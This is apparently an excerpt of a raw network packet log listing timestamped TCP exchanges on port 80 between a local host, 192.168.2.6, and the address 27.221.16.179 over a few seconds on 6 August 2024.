                                                                                                                                    Aug 6, 2024 10:30:35.627644062 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.627655029 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.627677917 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.627686024 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.627710104 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.627743959 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.627759933 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.627777100 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.627810001 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.627834082 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.627844095 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.627888918 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.632740974 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.632776976 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.632828951 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.926809072 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.926831007 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.926841974 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.926870108 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.926904917 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.926918983 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.927040100 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.927233934 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.927283049 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.927361965 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.927391052 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.927423954 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.927452087 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.927458048 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.927567005 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:35.928159952 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.928229094 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.928260088 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.928293943 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:35.928383112 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.019331932 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.068547964 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.276587009 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276634932 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276652098 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276668072 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276685953 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276705027 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276714087 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.276715040 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.276722908 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276743889 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.276748896 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.276823997 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.277329922 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.277374029 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.277400970 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.277419090 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.277436972 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.277452946 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.277457952 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.277479887 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.277829885 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.278290033 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.278331041 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.278347015 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.278362989 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.278376102 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.278386116 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.278470039 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.317687988 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.626960039 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.626996040 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627015114 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627083063 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.627132893 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627147913 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627166986 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627185106 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627202988 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627221107 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627224922 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.627238989 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627245903 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.627888918 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627908945 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.627923965 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.628021002 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628041029 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628057003 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.628060102 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628103018 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628117085 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628124952 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628133059 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628173113 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.628648996 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.628874063 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.628966093 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.968363047 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968394995 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968415976 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968437910 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968453884 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968449116 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.968467951 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968493938 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.968497992 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968506098 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.968527079 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968542099 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968556881 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.968563080 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.968591928 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.969202042 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969228983 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969278097 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.969413996 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969436884 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969451904 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969477892 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.969516039 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969531059 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969546080 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969561100 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.969562054 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.969593048 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:36.970269918 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.970293999 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:36.970318079 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.012296915 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.060620070 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.114533901 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.282810926 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282845020 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282860041 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282875061 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282890081 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282890081 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.282903910 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282917976 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282937050 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.282937050 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.282958031 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.282980919 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.283106089 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283137083 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283150911 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283173084 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.283215046 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283231974 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283246040 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283252954 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.283260107 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283273935 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.283282995 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.283317089 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.284548044 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284569979 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284584045 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284601927 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284610987 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.284616947 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284631014 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284646988 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284662008 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.284667015 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.284696102 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.284734011 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635626078 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635653019 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635675907 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635689974 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635696888 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635710955 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635715008 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635725975 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635740042 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635749102 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635755062 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635767937 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635783911 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635799885 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635802031 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635822058 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635824919 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635837078 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635842085 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635852098 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635864973 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635871887 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635879040 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635895014 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.635899067 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.635948896 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.982918024 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.982954979 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.982986927 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.982999086 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983011007 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983021021 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983032942 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983043909 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983056068 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983069897 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983088970 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983094931 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.983123064 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.983601093 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983639002 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983649969 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983695030 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983705997 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983716011 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983735085 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.983773947 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983784914 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983795881 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.983794928 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.983822107 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.983870983 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.984661102 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984672070 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984683037 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984699965 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984711885 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984723091 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984734058 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984745026 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984743118 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.984755993 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.984766006 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.984778881 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:37.985418081 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:37.988240004 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.303845882 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303883076 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303910017 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303925037 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303940058 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303953886 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303953886 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.303968906 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303983927 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.303997993 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.303998947 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304007053 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304023981 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304025888 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304054976 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304224968 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304244995 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304274082 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304291964 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304299116 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304311037 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304335117 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304434061 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304629087 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304649115 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304683924 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304697990 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304713964 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304714918 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304749966 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304768085 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304778099 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304785967 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304804087 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304810047 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.304821968 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304845095 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.304874897 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.305521011 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305547953 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305562973 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305584908 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305588007 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.305599928 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305613995 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305628061 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305640936 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305648088 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.305655956 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305665016 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.305720091 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.305742025 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.305918932 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.621714115 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621783018 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621807098 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621823072 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621836901 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621855974 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621870995 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621889114 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.621928930 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.621994972 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.622019053 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622056961 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622073889 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622143984 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.622184992 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622200966 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622215033 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622230053 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622252941 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.622337103 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:38.622410059 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622425079 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:38.622441053 CEST804978127.221.16.179192.168.2.6
